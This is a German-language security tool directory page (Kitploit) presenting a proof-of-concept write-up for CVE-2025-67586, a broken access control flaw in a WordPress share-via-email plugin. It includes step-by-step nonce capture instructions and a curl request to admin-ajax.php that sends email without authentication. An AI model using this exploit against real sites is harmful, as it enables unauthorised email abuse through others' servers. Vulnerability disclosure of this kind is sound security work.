Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE — Write-ups für (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) | Kitploit
Tools/GitHubGitHub/r0xtsec/cve
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubr0xtsec/cve

CVE

Write-ups für (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE

Writeups für (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

root@kitploit:~
--------------   CVE-2025-67586 Exploit PoC   --------------
  • Exploit-Titel: WordPress Plugin 5.2.0 - Broken Access Control
  • Software-Link: https://wordpress.org/plugins/highlight-and-share/
  • Version: <= 5.2.0 (ERFORDERLICH)
  • CVE: CVE-2025-67586

==> Beschreibung Eine Schwachstelle durch fehlerhafte Zugriffskontrolle (Broken Access Control) besteht in einem WordPress-Plugin von DLX Plugins. Das Plugin stellt eine nicht authentifizierte AJAX-Aktion bereit, die es Angreifern ermöglicht, die "Share via Email"-Funktionalität ohne ordnungsgemäße Berechtigungsprüfungen zu missbrauchen.

Ein nicht authentifizierter Angreifer kann ein gültiges Post-Nonce wiederverwenden, um E-Mail-Sharing-Anfragen auszulösen, was zu unbefugtem E-Mail-Versand (E-Mail-Spam / Missbrauch) ohne Benutzerauthentifizierung führt.

==> Erforderliche Berechtigungen Keine (nicht authentifiziert)

==> Proof of Concept (PoC)

Schritt 1: Website mit installiertem Plugin auswählen

Schritt 2: Ein gültiges Nonce erhalten

  1. Einen öffentlichen Beitrag öffnen.
  2. Text markieren und auf Share via Email klicken.
  3. Entwicklertools öffnen → Netzwerk → XHR.
  4. Die E-Mail einmal senden.
  5. Die Anfrage mit folgendem Inhalt erfassen: action=has_email_social_modal nonce= post_id=

Schritt 3: Exploit über nicht authentifizierte Anfrage

bash-Befehl: (Website-URL, Post-URL und Nonce ersetzen)

curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed

--> Erwartete JSON-Antwort:

{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }

Tool herunterladen